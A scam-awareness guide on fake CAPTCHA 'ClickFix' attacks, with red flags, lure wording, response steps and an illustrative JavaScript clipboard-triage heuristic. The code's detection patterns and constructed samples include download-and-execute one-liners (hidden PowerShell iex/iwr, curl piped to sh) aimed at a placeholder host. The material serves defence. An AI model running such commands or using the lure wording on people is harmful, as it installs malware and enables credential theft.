Fake CAPTCHA Malware Scams
'Verify you are human' pages that trick you into running malware by pasting a command from your clipboard.
Last reviewed: 1 June 2026
What this scam is
Fake CAPTCHA malware scams — sometimes called ClickFix or clipboard-injection attacks — present a convincing 'verify you are human' page that looks like a legitimate CAPTCHA check but instead instructs you to follow a sequence of steps that result in you running malware on your own device. The crucial step involves pressing a keyboard shortcut that pastes a malicious command into a system tool, then pressing Enter to execute it. The command has been silently placed on your clipboard by the webpage without your knowledge.
This is a very current and actively used attack technique. The scam is dangerous precisely because it bypasses the browser's ability to detect and block downloads — because you, the person, are performing the final action yourself. No file is downloaded automatically; no suspicious link is clicked. You are instructed to open a legitimate system tool and type a command, and the page provides the 'command' by manipulating your clipboard behind the scenes.
The 'verify you are human' framing is compelling because real CAPTCHAs are so common across the web. We have all been trained to complete verification steps without much scrutiny. An attacker exploits this conditioned compliance by presenting a fake verification that has the same look and feel as a legitimate check but with very different instructions: open a specific system tool (the Windows Run dialogue, PowerShell, the Terminal, or a command prompt), press a key combination, and hit Enter.
The executed command typically downloads and runs malware in the background — credential stealers, banking trojans, or remote-access tools. The person believes they completed a routine security check and returns to what they were doing, unaware that their device is now compromised.
The fundamental rule to remember is this: no legitimate website, CAPTCHA service, or security verification will ever ask you to open a system tool and paste or type a command. If a webpage asks you to do this — for any reason, under any framing — it is a scam attempting to run malware on your device.
How it works
The attack begins when you visit a compromised or malicious website. This might be a site that serves malicious advertisements, a page you reached via a link in an email, a message, or a search result, or a site that has been temporarily hijacked. A full-screen or prominently placed overlay appears, styled to look exactly like the CAPTCHA or security check pages you encounter on real websites — including realistic-looking robot icons, checkboxes, and countdown timers.
The overlay then presents an unusual instruction. Common versions include: 'Press Windows + R, paste this into the box, and press Enter to verify you are human', 'Open PowerShell and type the command below to complete verification', or 'Press Ctrl+V in the address bar and press Enter'. Each version is a slight variation on the same mechanism.
The critical element is that when the page loaded, it silently ran a script that placed a malicious command on your system clipboard — replacing anything you had previously copied. You may not notice this has happened. When you follow the instructions and press Ctrl+V (paste) in the indicated tool, the malicious command appears. If you press Enter, it executes.
The command is typically a one-line instruction that connects to a remote server, downloads a malicious payload, and executes it — all in the background and typically completing in seconds. The malware installed may be a credential stealer (harvesting saved passwords and session cookies), a banking trojan, or a remote-access tool that gives the attacker persistent control of your device.
The attack requires no technical vulnerability in your browser or operating system. It relies entirely on you following the instructions — which is why the social engineering framing is so important. The CAPTCHA context makes the instructions seem routine.
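As an added illustration (not part of the original page), the JavaScript below triages text that has been pasted from the clipboard into a plain text editor. It flags the traits described above: a system tool being launched, a remote server contacted, fetched content executed, and activity kept in the background. The rule names, patterns and sample strings are constructed for this example, and it is a heuristic aid rather than a complete detector.

```javascript
// Added example: heuristic triage of text found on the clipboard.
// Rules and samples are constructed for illustration, not a complete detector.
const RULES = [
  // Starts a system tool or script host (PowerShell, command prompt, Terminal shell).
  { id: 'launches-system-tool',
    re: /(^|[\s;&|"'(])(powershell|pwsh|cmd|mshta|wscript|cscript|bash|zsh|sh|osascript)(\.exe)?(?=$|[\s;&|"')])/i },
  // Connects to a remote server.
  { id: 'contacts-remote-server',
    re: /https?:\/\/|\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b/i },
  // Runs what was fetched instead of only saving it.
  { id: 'executes-fetched-content',
    re: /\b(iex|invoke-expression)\b|\|\s*(ba|z)?sh\b/i },
  // Keeps the activity out of sight, so nothing visible happens.
  { id: 'runs-in-background',
    re: /-w(indowstyle)?\s+h(idden)?\b|\bnohup\b|&\s*$/i },
];

function triageClipboardText(text) {
  // Collapse line breaks and runs of spaces so split-up commands still match.
  const line = String(text).replace(/\s+/g, ' ').trim();
  const hits = RULES.filter((rule) => rule.re.test(line)).map((rule) => rule.id);
  const has = (id) => hits.includes(id);
  let verdict = hits.length > 0 ? 'review' : 'no-indicators';
  // A system tool combined with network access or a hidden window matches
  // the pattern this page describes: treat it as do-not-run.
  if (has('launches-system-tool') &&
      (has('contacts-remote-server') || has('runs-in-background'))) {
    verdict = 'do-not-run';
  }
  return { verdict, hits };
}

// Constructed samples; example.invalid is a reserved, non-resolving name.
const SAMPLES = {
  fakeCaptcha: 'powershell -w hidden -c "iex (iwr https://example.invalid/placeholder)"',
  macVariant: 'curl -s https://example.invalid/placeholder | sh',
  copyButton: 'git clone https://example.invalid/project.git',
  plainText: 'Reminder: call the bank on Tuesday',
};

for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(triageClipboardText(text)));
}
```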
Why this scam works
The attack is effective because it co-opts the familiarity and authority of a security check. CAPTCHAs carry implicit legitimacy — they exist to protect sites, so a page that looks like one feels trustworthy rather than threatening. The instructions are framed as being for your protection and to verify your humanity, which reverses the actual dynamic. You are not being protected; you are being exploited.
The clipboard manipulation is invisible. You did not see anything malicious happen; you did not choose to copy anything dangerous. The command appears naturally when you paste, looking like it belongs there. The pressure to complete the verification and continue what you were doing provides motivation to follow through quickly rather than reading the pasted text carefully.
Because you perform the final action yourself — opening a system tool and pressing Enter — your browser's security features and the operating system's automatic defences are bypassed. There is no download to block, no warning to ignore. The defence must be behavioural.
A typical pattern
A person searching online clicks a link that leads to what appears to be a legitimate article or file-hosting page. Before the content loads, a full-screen verification overlay appears, styled like a CAPTCHA. The overlay instructs them to 'press Windows + R, paste, and press Enter to prove you are not a robot'. They follow the steps. The Run dialogue opens, a command appears (placed there by the page), and they press Enter. The dialogue closes and nothing visible happens. Several days later, their email account is accessed from overseas, several saved passwords stop working, and their bank shows an unauthorised login attempt. A security scan reveals a credential-stealing application installed around the time they completed the verification.
Common red flags
- A CAPTCHA or verification page asking you to open a system tool
- Instructions to press Windows+R, open PowerShell, or open a command prompt to 'verify'
- Instructions to press Ctrl+V or paste something into a system application
- A page that appeared after clicking a link in an unexpected message or email
- Verification instructions that seem unusual or that you have never seen before on a real site
- A pre-filled command appearing in a system tool after following verification instructions
- A countdown timer pressuring you to complete the verification steps quickly
- An overlay that covers the whole page and cannot be dismissed before completing the steps
Sanitized example messages
Illustrative, sanitized examples. Personal details are replaced with placeholders such as [phone number] and [fake link].
Verify you are human: Press Windows+R, paste the code below, and press Enter to continue.
Security check required: Open PowerShell (Windows+R, type 'powershell'), paste this command, and press Enter.
To confirm you are not a robot, press Ctrl+V in the address bar and press Enter.
Human verification step 2: Copy the code below, open the Run dialogue (Win+R), paste it, and click OK.
Access verification required. Click the button below, then paste the generated code into your terminal to complete.
Almost there — to unlock your access, run the verification command below in your system console.
Common variations
- Windows Run dialogue variant — instructs Win+R, paste, Enter
- PowerShell variant — instructs opening PowerShell and pasting a command
- Browser address bar variant — instructs Ctrl+V in the address bar
- macOS Terminal variant — targets Mac users with identical social engineering
- Fake document viewer — appears when attempting to open an online document
- Fake age verification — wraps the attack in an age-check framing rather than a CAPTCHA
How to verify before you act
The test is simple and absolute: no legitimate CAPTCHA or website security check will ever ask you to open a system tool — the Windows Run dialogue (Win+R), PowerShell, Terminal, a command prompt, or any similar application — and paste or type a command.
Real CAPTCHAs work entirely within the browser: you click images, solve a puzzle, or check a box. They do not involve your operating system in any way. If a verification step requires you to leave the browser and interact with a system tool, that step is malicious regardless of how convincing the surrounding page looks.
If you are on a page that gives these instructions, close the browser tab without following them. Do not press the keyboard shortcuts. Do not open any system tool. If you are unsure what was copied to your clipboard, you can open a plain text editor (like Notepad), paste into it to see what is there, then close it without saving. The malicious command is harmless while it sits in the text editor, so you can read it there safely. Do not run it.
Be particularly alert if the page appeared after clicking a link in a message or email, or after encountering a pop-up or redirect.
Payment methods used
- Harvested credentials used for banking access and financial theft
- Ransomware extortion payment if ransomware is installed
Who is usually targeted
- General web users across all age groups
- People who encounter CAPTCHA checks regularly and are conditioned to complete them
- Anyone following links from emails, messages, or search results
What to do immediately
- Close the browser tab immediately without following the instructions
- If you already ran a command, disconnect from the internet immediately
- Run a full security scan as soon as possible
- Change passwords for important accounts from a clean, separate device
- Revoke active browser sessions and enable two-factor authentication on critical accounts
- Contact your bank if you have reason to believe financial accounts may have been accessed
- Report the page to your browser's built-in abuse reporting tool
How to prevent it
- Remember: no legitimate website CAPTCHA will ever ask you to open a system tool or paste a command
- If a verification step instructs you to use Win+R, PowerShell, Terminal, or any command tool — close the page
- Never paste into a system tool content that was placed on your clipboard by a website
- Use an ad blocker to reduce exposure to malicious advertising redirects
- Be cautious of pages reached via links in emails, messages, or unexpected search results
- Keep your operating system and browser updated to apply security patches
- Talk to less technically confident family members — this attack is very convincing regardless of technical skill
- If you want to see what is on your clipboard safely, paste into a plain text editor first
Evidence to preserve
- The URL of the page that displayed the fake CAPTCHA
- Screenshot of the overlay and its instructions
- The command that appeared in your clipboard (note it down without running it)
- Any link or message that led you to the page
- Security scan results showing what was installed
Where to report it
- Action Fraud (UK) — UK national fraud & cybercrime reporting centre
- FTC ReportFraud (US) — US Federal Trade Commission fraud reports
- FBI IC3 (US) — US Internet Crime Complaint Center
- Scamwatch (Australia) — Australian competition & consumer reporting
- Your bank's fraud line — use the number on the back of your card or in your banking app, never a number the caller gives you
Always verify reporting routes and emergency contacts on the official government or agency website for your country.
Frequently asked questions
What makes this different from a regular CAPTCHA?
A real CAPTCHA works entirely within the browser — you click images, tick a box, or solve a puzzle. It never asks you to open a system application or paste a command. Any 'verification' requiring you to interact with Win+R, PowerShell, Terminal, or any command-line tool is fake.
I followed the instructions — what should I do now?
Disconnect from the internet immediately, run a full security scan, and change important passwords from a clean device. Act quickly — credential-stealing malware can exfiltrate passwords within minutes of installation.
Why does pasting into a system tool run malware?
When you paste a command into a system tool like PowerShell or the Run dialogue and press Enter, you are executing that command on your computer with your own user permissions. The command, placed on your clipboard by the webpage, downloads and installs malware.
How did something get onto my clipboard without me copying it?
Websites can run JavaScript that writes content to your clipboard without any visible action on your part. This is normally harmless — some sites use it to make 'copy code' buttons work — but it can also be used maliciously. Being aware of this capability is the first step in recognising the attack.
Is this attack only on Windows?
No. Variants targeting macOS use the Terminal application. The social engineering framing is the same; only the specific tool and command change. The rule is the same on all platforms: never run a command from a web page's instructions.
Would my antivirus or browser warn me?
Not necessarily. Because you perform the final action yourself, automated defences often cannot intervene. Some security software detects the malware after installation, but the best defence is behavioural — recognising the attack pattern and not following the instructions.
What is 'ClickFix'?
ClickFix is a common name used by security researchers for this attack category. The name comes from the framing used by some variants — 'click here to fix an error' — which then leads to the clipboard-paste execution sequence. The underlying mechanism is the same regardless of the framing used.
Can I safely check what is on my clipboard?
Yes — open a plain text editor such as Notepad (Windows) or TextEdit (Mac), click inside it, and press Ctrl+V (or Cmd+V). You will see the contents of your clipboard as plain text. It is harmless to view there. Close without saving and do not run any command you see.